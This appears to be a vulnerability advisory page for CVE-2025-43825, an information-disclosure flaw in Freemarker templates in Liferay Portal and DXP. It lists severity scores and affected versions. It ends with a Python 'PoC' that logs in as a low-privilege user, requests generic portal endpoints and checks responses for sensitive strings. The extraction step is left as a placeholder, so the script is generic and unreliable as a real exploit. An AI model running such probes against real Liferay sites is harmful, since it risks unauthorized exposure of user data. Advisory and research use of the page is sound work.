Security Vulnerability Report
CVE-2025-43825 CVSS 6.5 MEDIUM

CVE-2025-43825

Published: 2025-10-03 22:15:31
Last Modified: 2025-12-15 18:22:05

Description

A vulnerability in Liferay Portal 7.4.0 through 7.4.3.132, and Liferay DXP 2025.Q1.0 through 2025.Q1.4, 2024.Q4.0 through 2024.Q4.5, 2024.Q3.0 through 2024.Q3.13, 2024.Q2.1 through 2024.Q2.13, 2024.Q1.1 through 2024.Q1.12, 2023.Q4.0 through 2023.Q4.10, 2023.Q3.1 through 2023.Q3.10, and 7.4 GA through update 92 allows sensitive user data to be included in the Freemarker template. This weakness permits an unauthorized actor to gain access to, and potentially render, confidential information that should remain restricted.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE
Liferay Portal 7.4.0 - 7.4.3.132
Liferay Portal 7.4 GA - update 92
Liferay DXP 2025.Q1.0 - 2025.Q1.4
Liferay DXP 2024.Q4.0 - 2024.Q4.5
Liferay DXP 2024.Q3.0 - 2024.Q3.13
Liferay DXP 2024.Q2.1 - 2024.Q2.13
Liferay DXP 2024.Q1.1 - 2024.Q1.12
Liferay DXP 2023.Q4.0 - 2023.Q4.10
Liferay DXP 2023.Q3.1 - 2023.Q3.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-43825 PoC - Liferay Portal/DXP Freemarker Template Information Disclosure
# This vulnerability allows low-privileged users to access sensitive data
# through improperly configured Freemarker templates.

import requests

# Target Liferay Portal/DXP instance
TARGET_URL = "https://target-liferay-instance.com"

# Step 1: Authenticate with low-privileged credentials
session = requests.Session()
login_data = {
    "_com_liferay_login_web_portlet_LoginPortlet_formDate": "",
    "_com_liferay_login_web_portlet_LoginPortlet_saveLastPath": "false",
    "_com_liferay_login_web_portlet_LoginPortlet_redirect": "",
    "_com_liferay_login_web_portlet_LoginPortlet_doActionAfterLogin": "false",
    "_com_liferay_login_web_portlet_LoginPortlet_login": "low_priv_user",
    "_com_liferay_login_web_portlet_LoginPortlet_password": "password123"
}

# Perform login
response = session.post(
    f"{TARGET_URL}/c/portal/login",
    data=login_data,
    allow_redirects=True
)

# Step 2: Access the vulnerable template endpoint
# The vulnerable Freemarker template exposes sensitive user data
vulnerable_endpoints = [
    "/web/guest/home",
    "/group/control_panel/manage",
    "/c/portal/layout",
]

for endpoint in vulnerable_endpoints:
    resp = session.get(f"{TARGET_URL}{endpoint}")

    # Step 3: Extract sensitive information from response
    if "sensitive_data" in resp.text or "userCredentials" in resp.text:
        print(f"[+] Sensitive data found at: {endpoint}")
        # Parse and extract confidential information
        # ... extraction logic here

# Note: The exact endpoint depends on the specific vulnerable template
# configuration in the target Liferay instance.
